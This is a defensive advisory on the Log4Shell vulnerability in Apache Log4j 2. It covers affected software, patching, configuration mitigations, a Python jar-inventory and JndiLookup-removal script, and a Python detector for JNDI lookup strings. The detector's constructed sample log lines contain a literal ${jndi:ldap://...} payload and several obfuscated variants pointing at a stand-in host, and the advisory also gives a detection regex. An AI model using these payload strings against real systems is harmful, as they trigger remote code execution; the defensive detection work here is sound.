The critical vulnerability CVE-2021-44228 (now widely called Log4Shell) in Apache Log4j 2 was disclosed with zero-day exploitation already under way. Log4j 2 versions 2.0-beta9 through 2.14.1 evaluate ${...} lookups inside logged messages, so if an application running one of those versions logs any string an attacker controls (an HTTP header, a username, a chat message), the attacker can make the application fetch and execute remote code through a JNDI lookup and run anything they wish on the system.
Currently, there is a public proof-of-concept, and we are observing the first wave of discovery attacks (probes to determine who is vulnerable) as well as the beginning of a second wave that drops crypto-mining software. Following the usual escalation pattern for this type of vulnerability, we expect to see automated ransomware deployment by Monday, December 13, 2021.
Affected Systems/Applications of Note
As stated above, devices and applications that use a vulnerable Log4j 2 to log user-controlled input are affected. Applications and services known to ship a vulnerable Log4j 2 include:
- Apache Solr, Druid, Flink, and Struts2
- Logstash and Elasticsearch (Elastic reported that the Java Security Manager in Elasticsearch prevents code execution but still allows information leakage via DNS, while Logstash was exposed to remote code execution)
- Even home entertainment software such as Minecraft: Java Edition, where a chat message was enough to trigger the lookup
Early lists also named Redis, Kafka and Steam, but Redis and Steam are not Java applications and Apache Kafka still used Log4j 1.x, so none of them is affected by this CVE. Confirm exposure against each vendor's own advisory rather than a third-party list.
Remediation
Apache has released a fixed version of Log4j 2 (2.15.0 at the time of writing; later 2.x releases closed gaps found in that first fix, so take the latest 2.x available). Developers using the component directly can download it here: https://logging.apache.org/log4j/2.x/download.html
Third-party applications and systems that bundle Log4j should be patched as soon as vendor updates are available, and any follow-up patches should be evaluated and installed just as quickly, since the initial fix itself was revised.
Mitigation
According to Cloudflare, and consistent with Apache's own advisory, the attack can be mitigated on versions that cannot be upgraded immediately by one of these two configuration changes:
- Set the system property "log4j2.formatMsgNoLookups" to "true" (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to "true"). This only takes effect on Log4j 2.10.0 through 2.14.1, and Apache later found it insufficient when attacker-controlled data reaches other lookups in the logging configuration, so treat it as a stopgap.
- Remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class inside log4j-core-*.jar) from the classpath. This works on every affected 2.x version and is the mitigation Apache recommends when upgrading is not possible; the JVM must be restarted afterwards.
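As an added example (not TorchLight's, Cloudflare's or Apache's own tooling), the following Python script inventories log4j-core jars under a directory, reads each version from the Maven pom.properties that the official jars carry, flags the affected range, and strips JndiLookup.class by rewriting the jar, which has the same effect as Apache's published `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. It assumes jars sit on disk as plain .jar files (jars nested inside .war or .ear archives are not unpacked), and the fixed-version threshold is a constant that should be raised to whatever the current Apache guidance is (2.17.x by late December 2021). The sample jar it builds for the demo is a constructed fixture, not a real Log4j build. Stop the JVM before rewriting a jar it has loaded.

```python
"""Inventory log4j-core jars and strip JndiLookup.class (CVE-2021-44228 stopgap).
Added example for this advisory; not TorchLight's or Apache's own tooling."""
import os
import re
import shutil
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIRST_AFFECTED = (2, 0, 0)   # 2.0-beta9 onward; beta suffixes compare as 2.0.0 here
FIXED_VERSION = (2, 15, 0)   # first fixed release; raise to current Apache guidance


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        return None
    return tuple(int(x) if x else 0 for x in m.groups())


def log4j_core_version(jar_path):
    """Version string from the jar's Maven pom.properties, or None if absent."""
    with zipfile.ZipFile(jar_path) as zf:
        if POM_PROPS not in zf.namelist():
            return None
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    return None


def has_jndi_lookup(jar_path):
    with zipfile.ZipFile(jar_path) as zf:
        return JNDI_CLASS in zf.namelist()


def assess_jar(jar_path):
    """Classify one jar by version range and by presence of the JNDI lookup class."""
    version = log4j_core_version(jar_path)
    vt = parse_version(version) if version else None
    return {
        "path": jar_path,
        "version": version,
        "vulnerable_version": vt is not None and FIRST_AFFECTED <= vt < FIXED_VERSION,
        "jndi_present": has_jndi_lookup(jar_path),
    }


def scan_tree(root):
    """Walk a directory tree and assess every jar that looks like log4j-core."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not name.lower().endswith(".jar") or not zipfile.is_zipfile(path):
                continue
            if log4j_core_version(path) is None and not has_jndi_lookup(path):
                continue
            findings.append(assess_jar(path))
    return findings


def strip_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class. True if removed, False if absent."""
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_CLASS not in src.namelist():
            return False
        fd, tmp_path = tempfile.mkstemp(suffix=".jar", dir=os.path.dirname(jar_path) or ".")
        os.close(fd)
        with zipfile.ZipFile(tmp_path, "w") as dst:
            for info in src.infolist():          # copy every other entry unchanged
                if info.filename != JNDI_CLASS:
                    dst.writestr(info, src.read(info.filename))
    shutil.move(tmp_path, jar_path)             # atomic replace within the same directory
    return True


def build_sample_jar(directory, version="2.14.1", include_jndi=True):
    """Constructed fixture carrying only the entries this script inspects; not a real build."""
    path = os.path.join(directory, f"log4j-core-{version}.jar")
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPS, f"version={version}\n")
        zf.writestr("org/apache/logging/log4j/core/lookup/DateLookup.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return path


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as work:
        jar = build_sample_jar(work)
        for finding in scan_tree(work):
            print("before:", finding)
        print("removed JndiLookup:", strip_jndi_lookup(jar))
        print("after: ", assess_jar(jar))
```

Run it against an application's install directory (for example `scan_tree("/opt/myapp")`) to get one record per jar; a jar with `jndi_present` True is exploitable regardless of what a vendor list says, and a jar whose version is in range but already lacks the class has been mitigated by hand. Inventory from file metadata alone can miss shaded or renamed jars, so the presence check on the class file is the one to trust.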
Another mitigation is to use web application firewalls and other filters to block the strings the proof-of-concept uses. This will require testing, as it can very well break things, and it is only a partial measure: attackers quickly moved to obfuscated payloads (mixed case and nested lookups) that a literal pattern does not match. From current knowledge, the regular expression to block, or to use when searching logs, is:
- \$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+
Note that this pattern is case-sensitive and covers only three of the JNDI schemes Log4j can dereference, so treat a match as a strong signal and a miss as inconclusive.
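The following Python detector, added here as an example and not part of TorchLight's or Cloudflare's guidance, runs the regex above over a handful of constructed log lines and compares it with a detector that first resolves Log4j's own lookup syntax (${lower:x}, ${upper:x}, ${env:UNSET:-x}, ${::-x}) before matching. It assumes that any environment-variable lookup in a payload refers to an unset variable (attackers pick names that will not exist), and it accepts every JNDI scheme Log4j can dereference rather than three of them. The log lines are made up for the demo, not captured traffic.

```python
"""Detect CVE-2021-44228 triggers in log lines, plain and de-obfuscated.
Added example for this advisory; sample lines below are constructed."""
import re

# The pattern quoted in the advisory, exactly as published.
PLAIN_RE = re.compile(r"\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+")

# Every remote scheme Log4j's JndiLookup could follow, matched case-insensitively
# because Log4j lowercases lookup names before dispatching them.
JNDI_SCHEMES = ("ldaps", "ldap", "rmi", "dns", "iiop", "corba", "nis", "nds")
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(" + "|".join(JNDI_SCHEMES) + r")\s*:", re.IGNORECASE)

# An innermost lookup: ${...} whose body contains no further '$', '{' or '}'.
INNER_RE = re.compile(r"\$\{([^${}]*)\}")


def _resolve_one(body):
    """Resolve one innermost lookup the way an attacker relies on Log4j doing it.
    Assumption: env/sys lookups in payloads name variables that are unset, so the
    ':-' default wins. The jndi lookup itself is left intact for the matcher."""
    name, _, arg = body.partition(":")
    name = name.strip().lower()
    if name == "jndi":
        return "${" + body + "}"
    if ":-" in body:                       # ${env:UNSET:-j} or ${::-j} -> 'j'
        return body.split(":-", 1)[1]
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return "${" + body + "}"               # date, ctx, etc.: leave unchanged


def normalize(text, max_rounds=20):
    """Repeatedly collapse innermost lookups until the line stops changing."""
    for _ in range(max_rounds):
        new = INNER_RE.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def classify(line):
    """(plain regex hit, normalized detector hit, normalized text) for one line."""
    norm = normalize(line)
    return bool(PLAIN_RE.search(line)), bool(JNDI_RE.search(norm)), norm


# Constructed access-log lines: one literal payload, three obfuscated variants,
# one non-default scheme, one benign request. Not real traffic.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.9/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.9/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${JNDI:ldap://203.0.113.9/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:iiop://203.0.113.9/a}"',
    '10.0.0.10 - - "GET /login HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
]


def scan(lines):
    """Return (lines flagged by the plain regex, lines flagged after normalizing)."""
    results = [classify(l) for l in lines]
    return sum(1 for r in results if r[0]), sum(1 for r in results if r[1])


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        plain, normalized, norm = classify(line)
        print(f"plain={plain!s:5} normalized={normalized!s:5} {norm}")
    print("hits:", scan(SAMPLE_LINES))
```

On the six sample lines the published regex flags only the literal payload, while the normalizing detector flags all five malicious lines and leaves the benign request alone. A real deployment would feed the normalized text to a SIEM rule and alert on any `${jndi:` that survives normalization; the WAF should block on the same normalized form, since blocking on the raw string is what the obfuscated variants were designed to defeat.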
Conclusion
Because this component is used by a substantial number of applications and systems, keep a close watch on anything that runs Java, whether built in-house or supplied by a vendor, and do not assume a product is safe because it is missing from a published list. Useful indicators are a JVM process making unexpected outbound LDAP, RMI or DNS connections (the callbacks the exploit depends on), new child processes spawned by a Java service, and a spike in CPU usage on such a system, which may indicate crypto-mining activity with ransomware possibly to follow.
Reach out to TorchLight at sales@torchlight.io for help on remediation or any questions.
Additional Resources
- https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/
- https://www.zdnet.com/article/log4j-zero-day-flaw-what-you-need-to-know-and-how-to-protect-yourself/